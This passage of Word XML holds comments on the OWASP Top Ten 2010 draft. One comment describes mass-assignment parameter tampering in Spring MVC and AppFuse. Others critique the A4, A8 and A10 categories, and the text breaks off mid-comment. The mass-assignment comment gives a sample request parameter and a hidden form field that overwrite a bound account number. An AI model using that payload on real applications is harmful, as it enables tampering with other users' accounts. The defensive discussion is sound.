      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> am not just mentioning the normal parameter tampering. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C914CE" w:rsidRDefault="00C914CE" w:rsidP="00C914CE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">As developers have been adopting Open Source Web Frameworks (Struts 1.x and 2.x, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SpringMVC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, JSF, etc.) they inherit the programming paradigms of these framework.  The problem is that developers do not understand the security implications of following the patterns of these frameworks.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C914CE" w:rsidRDefault="00C914CE" w:rsidP="00C914CE">
      <w:r>
        <w:t xml:space="preserve">One example is the parameter tampering caused by the dynamic binding mechanism of request parameters to Command, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ActionForm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, Action, or other request processing  objects.  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Dinis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Cruz and Ryan Berg discuss this in their excellent paper:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C914CE" w:rsidRDefault="00C914CE" w:rsidP="00C914CE">
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.ouncelabs.com/writable/resources/file/ounce_springframework_vulnerabilities.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C914CE" w:rsidRDefault="00C914CE" w:rsidP="00C914CE">
      <w:r>
        <w:t>The problem that developers are doing is placing sensitive objects (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ApplicationContext</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, list of Accounts, etc.) directly in these request processing objects.  These objects can be tampered with either through insider information or looking at the source of the generated html pages.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C914CE" w:rsidRDefault="00C914CE" w:rsidP="00C914CE">
      <w:r>
        <w:t>The problem is further compounded by the fact that many frameworks which facilitate development with these open source frameworks advocate a merging of the persistent model objects and the request processing objects.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C914CE" w:rsidRDefault="00C914CE" w:rsidP="00C914CE">
      <w:r>
        <w:t xml:space="preserve">See </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Appfuse</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (which is a great productivity enhancer </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>asides</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> from the security vulnerability it introduces):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C914CE" w:rsidRDefault="00C914CE" w:rsidP="00C914CE">
      <w:r>
        <w:t>The Person object persistent entity created here:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C914CE" w:rsidRDefault="00C914CE" w:rsidP="00C914CE">
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://appfuse.org/display/APF/Persistence</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C914CE" w:rsidRDefault="00C914CE" w:rsidP="00C914CE">
      <w:r>
        <w:t>Has its attributes set by request parameters here:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C914CE" w:rsidRDefault="00C914CE" w:rsidP="00C914CE">
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://appfuse.org/display/APF/Using+Spring+MVC</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C914CE" w:rsidRDefault="00C914CE" w:rsidP="00C914CE">
      <w:r>
        <w:t>This ultimately compounds the issue because any persistent entity attribute can now be modified through request parameters.  These persistent entities are passed to a DAO (Data Access Layer) and have their attributes and any sub object attributes persisted to the database.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C914CE" w:rsidRDefault="00C914CE" w:rsidP="00C914CE">
      <w:r>
        <w:t>Most applications follow this pattern to get away from duplicating DTOs (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DataTransfer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Objects). </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C914CE" w:rsidRDefault="00C914CE" w:rsidP="00C914CE">
      <w:r>
        <w:t>This is a problem that most developers are unaware of.  Some are under the mistaken belief that the dynamic binding only works with Strings and primitive types but this is not true.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C914CE" w:rsidRDefault="00C914CE" w:rsidP="00C914CE">
      <w:r>
        <w:t>For example, an attacker can attack List and Array attribute types (in this case accounts is a List or Array) of a command object by creating a request parameter like the following:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C914CE" w:rsidRDefault="00C914CE" w:rsidP="00C914CE">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>commandObj.accounts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>0].</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>accountNumber</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=#attacker’s Desired Account Number# </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C914CE" w:rsidRDefault="00C914CE" w:rsidP="00C914CE">
      <w:r>
        <w:t>&lt;input type=”hidden” name=”</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>commandObj.accounts</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>0].</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>accountNumber</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” value=”#</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>newValue</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>#”&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C914CE" w:rsidRDefault="00C914CE" w:rsidP="00C914CE">
      <w:r>
        <w:t>Regards,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C914CE" w:rsidRDefault="00C914CE" w:rsidP="00C914CE">
      <w:r>
        <w:t>Honest</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C914CE" w:rsidRDefault="009C2FFD" w:rsidP="00C914CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidR="00C914CE">
        <w:t xml:space="preserve">James </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00C914CE">
        <w:t>Hu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C914CE" w:rsidRDefault="00C914CE" w:rsidP="00620578">
      <w:pPr>
        <w:spacing w:after="240"/>
      </w:pPr>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Hi,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Here</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is my comments on the 2010 Top 10:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>---- A4 - Insecure Direct Object References</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">1.   In 'How do I </w:t>
      </w:r>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prevent this' section</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,  'Use</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> indirect object reference' is really not an effective method in protecting this type of  vulnerability.     Only access check is right way to fix this problem.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>2.  When there are more than one method listed in any 'How do I prevent this' sections</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,  it</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is not clear about whether they are in AND or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> relationship.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>3.  A4 loo</w:t>
      </w:r>
      <w:r w:rsidR="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ks like a redundant one to A7 (</w:t>
      </w:r>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Failure to restrict URL </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>access )</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> to some extent. It is better to add this as an example attack vector in A7.  It does not deserve to be one of Top 10.   In my opinion</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>,  the</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  'Information Leakage...' should not be removed though. </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">4.  External section lists 'Path Traversal' as a reference.   It is confusing to categorize it as direct object reference attack </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>( if</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> so, all types of  injection attacks can be regarded as direct object references ). It should be listed as reference in A1 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>( injection</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> ).   </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">I understand the </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>A1  is</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> intended to cover all types of injection related attack vectors.  In fact, A1 should list all common injection attacks </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">( </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>e.g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in SANs top 25 )  including traversal, XSS, email injection, etc </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">---- A8 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Unvalidated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Redirects and Forwards.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">1.  This one may only deserve to be an example of A1 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>( Injection</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> )</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>2.   In 'How do I prevent this' section, the first method looks inappropriate.  It should state as 'avoid including input data in forward string ' instead of 'avoid forward' since all web applications need forward.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Also, not sure how you come up with the Impact level.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>e.g.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">   Impact on A4, A5, A6 and A7 can have the same severity level as A1 but they are set as moderate while A1 is severe...    Since each attack in the top ten </w:t>
      </w:r>
      <w:r w:rsidR="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>can have various impact levels,</w:t>
      </w:r>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>If</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> you just give the highest impact, it can also be confusing, at least, it needs to clearly explain how the impact is set...  Or, simply remove this metrics to avoid confusion. </w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>Thanks,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">James </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00620578">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Hu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00620578" w:rsidRDefault="009C2FFD" w:rsidP="00C914CE">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidR="00620578">
        <w:t>Chris Palmer</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620578" w:rsidRDefault="00620578" w:rsidP="00620578">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>Hello,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620578" w:rsidRDefault="00620578" w:rsidP="00620578">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>I had a comment on the new Top Ten release candidate.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620578" w:rsidRDefault="00620578" w:rsidP="00620578">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>First, thank you for continuing to maintain the OWASP Top Ten. In the past, the OWASP Top Ten have served us well as a discussion point and as a benchmark for web application developers and security engineers to focus on. OWASP has a chance to raise the bar again.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620578" w:rsidRDefault="00620578" w:rsidP="00620578">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>However, I think there is an error in rc1. You list A10 as “Insufficient Transport Layer Protection”. You cite the problem as one of insufficient confidentiality protection “when it is necessary to protect sensitive communications”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620578" w:rsidRDefault="00620578" w:rsidP="00620578">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>I would like to see the OWASP Top Ten state a far stronger case for a secure transport layer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00620578" w:rsidRDefault="00620578" w:rsidP="00620578">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
